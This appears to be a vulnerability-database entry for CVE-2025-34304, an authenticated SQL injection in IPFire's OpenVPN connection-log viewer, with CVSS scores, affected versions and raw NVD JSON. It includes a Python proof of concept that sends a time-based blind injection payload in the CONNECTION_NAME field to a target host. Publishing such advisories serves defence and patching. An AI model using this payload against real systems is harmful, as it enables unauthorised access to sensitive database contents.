Security Vulnerability Report
中文
CVE-2025-34304 CVSS 6.5 MEDIUM

CVE-2025-34304

Published: 2025-10-28 15:16:11
Last Modified: 2025-11-03 17:01:20
Source: [email protected]

Description

IPFire versions prior to 2.29 (Core Update 198) contain a SQL injection vulnerability that allows an authenticated attacker to manipulate the SQL query used when viewing OpenVPN connection logs via the CONNECTION_NAME parameter. When viewing a range of OpenVPN connection logs, the application issues an HTTP POST request to the Request-URI /cgi-bin/logs.cgi/ovpnclients.dat and inserts the value of the CONNECTION_NAME parameter directly into the WHERE clause without proper sanitization or parameterization. The unsanitized value can alter the executed query and be used to disclose sensitive information from the database.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:* - VULNERABLE
IPFire < 2.29 (Core Update 198)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import time target_url = "http://target-ipfire:444/cgi-bin/logs.cgi/ovpnclients.dat" # Authentication cookies (obtain via valid login) cookies = { "sid": "your-session-id" } def test_sql_injection(): """Test for SQL injection via CONNECTION_NAME parameter""" # Normal request normal_payload = { "CONNECTION_NAME": "test_connection", "ACTION": "view", "range": "all" } # Time-based blind SQL injection payload # Extract database user using SLEEP() function sql_payload = "' OR (SELECT COUNT(*) FROM users WHERE username='admin' AND SLEEP(5))>0--" malicious_payload = { "CONNECTION_NAME": sql_payload, "ACTION": "view", "range": "all" } print("[*] Sending normal request...") start = time.time() response1 = requests.post(target_url, data=normal_payload, cookies=cookies) normal_time = time.time() - start print("[*] Sending malicious SQL injection request...") start = time.time() response2 = requests.post(target_url, data=malicious_payload, cookies=cookies, timeout=30) injection_time = time.time() - start print(f"[*] Normal request time: {normal_time:.2f}s") print(f"[*] Injection request time: {injection_time:.2f}s") if injection_time > normal_time + 4: print("[+] SQL Injection vulnerability confirmed!") print("[+] Time-based blind injection successful") else: print("[-] No SQL injection detected") if __name__ == "__main__": test_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34304", "sourceIdentifier": "[email protected]", "published": "2025-10-28T15:16:10.647", "lastModified": "2025-11-03T17:01:19.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IPFire versions prior to 2.29 (Core Update 198) contain a SQL injection vulnerability that allows an authenticated attacker to manipulate the SQL query used when viewing OpenVPN connection logs via the CONNECTION_NAME parameter. When viewing a range of OpenVPN connection logs, the application issues an HTTP POST request to the Request-URI /cgi-bin/logs.cgi/ovpnclients.dat and inserts the value of the CONNECTION_NAME parameter directly into the WHERE clause without proper sanitization or parameterization. The unsanitized value can alter the executed query and be used to disclose sensitive information from the database."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.29", "matchCriteriaId": "9A0A85D3-A192-4FD9-9510-99D85BCF334A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update183:*:*:*:*:*:*", "matchCriteriaId": "A39350F9-D6D9-49A5-88BC-C5489AA6038C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update184:*:*:*:*:*:*", "matchCriteriaId": "CDDC0CEB-073B-41A0-8A52-4DAAAD77AA6D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update185:*:*:*:*:*:*", "matchCriteriaId": "745640B9-2180-48C3-82CC-D6E73AAF95D5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update186:*:*:*:*:*:*", "matchCriteriaId": "08006D41-7288-4333-83FE-B6FD7CD5C779"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update187:*:*:*:*:*:*", "matchCriteriaId": "15EE4FEE-62AB-4172-B898-19DE6F50B7AC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update188:*:*:*:*:*:*", "matchCriteriaId": "5B0ECE9B-DD45-40E1-842A-0B0B1786187E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update189:*:*:*:*:*:*", "matchCriteriaId": "9B9BDB00-A750-4053-8812-5A3854042CB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update190:*:*:*:*:*:*", "matchCriteriaId": "16F654D7-CC82-4428-BBEF-1110CAE75597"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update191:*:*:*:*:*:*", "matchCriteriaId": "FFCC61A9-AF1B-4F8A-98D2-FB7854AF0EF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update192:*:*:*:*:*:*", "matchCriteriaId": "7A66DC97-E88F-455E-B688-88BCC95E861B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ipfire:ipfire:2.29:core_update193:*:*:*:*:*:*", "matchCriteriaId": "DDF56682-47E8-436F-B5FE-55A8B525D699"}, {"vulnerable": true, "criteria": "cpe:2. ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.